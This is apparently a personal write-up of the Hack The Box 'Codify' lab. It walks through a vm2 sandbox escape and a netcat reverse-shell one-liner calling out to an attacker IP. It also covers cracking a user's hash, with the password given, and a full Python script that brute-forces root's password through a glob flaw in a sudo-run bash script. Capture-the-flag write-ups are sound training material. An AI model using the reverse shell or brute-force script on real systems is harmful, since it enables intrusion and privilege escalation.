Dogan Genc ⚡️
Codify HTB WRITE UP

Codify HTB WRITE UP


WRITE UP

When we connect to the computer, we first examine the initial computer with nmap to determine which ports are open and with which ports we can communicate or launch attacks.

alt text

According to the Nmap results, we have an HTTP port and a port 3000 to examine. When we investigate port 3000, we find an online Node.js editor. In the editor, there is a JavaScript sandbox named “vm2.”

alt text

However, when we examine this sandbox, we discover that its version is vulnerable. Using a code snippet that bypasses this sandbox, we perform Remote Code Execution. The code I obtained is available on the website I provided below.

https://gist.github.com/leesh3288/e4aa7b90417b0b0ac7bcd5b09ac7d3bd

alt text

Before running the code “rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.42 4242 >/tmp/f” on the victim’s computer, I opened a listener on my own computer. I successfully obtained a shell.

alt text

After examining the machine for a while, I noticed that there is a database in the “/var/www/contact” directory. When I examined this database, I found a hash belonging to the user “joshua.”

alt text

Since this hash is from “/etc/shadow”, I also took the data from “/etc/passwd” file and cracked this hash. Our password is “spongebob1”.

alt text

Upon re-entering the computer, the first access granted to me was to which files and now that we have our password, I checked which commands I can use with the sudo command. When I typed “sudo -l”, I saw that I have permission to run a bash script as sudo. Here, I see that the user has created a password-checking code using a bash script. However, in the bash command, the expression “password” == “pass*” returns True. Therefore, malicious individuals can exploit this vulnerability to obtain the entire password.

alt text

Therefore, I wrote a Python code that extracts the root user’s password from this bash script using the “brute force” method, and I sent it to the victim’s computer.

alt text

Thus, we obtained the root user’s password in this way. By using this password with the “su” command, I became the root user and obtained the final flag.

I provided the brute force script I wrote at below

import subprocess
import string
import sys

"""
usage====> python3 brute.py ./file.sh
"""

def run_proc(passwd,input,file):
    lsProcess = subprocess.Popen(["echo","-e",passwd+input+"*"], stdout=subprocess.PIPE, text=True) 
    grepProcess = subprocess.Popen( 
        ["sudo",file], stdin=lsProcess.stdout, 
        stdout=subprocess.PIPE, text=True) 
    output, error = grepProcess.communicate() 

    return output 


input=string.printable

input=input[:93]
input=input.replace("*","")
input=input.replace("\\","")
input=input.replace("?","")
passwd=""
fail="fail"
i=0


while i!=len(input):
    if "fail" not in run_proc(passwd,input[i],sys.argv[1]):
        passwd=passwd+input[i]
        i=-1
        print(passwd)
    i=i+1

print("The password is ",passwd)
© 2024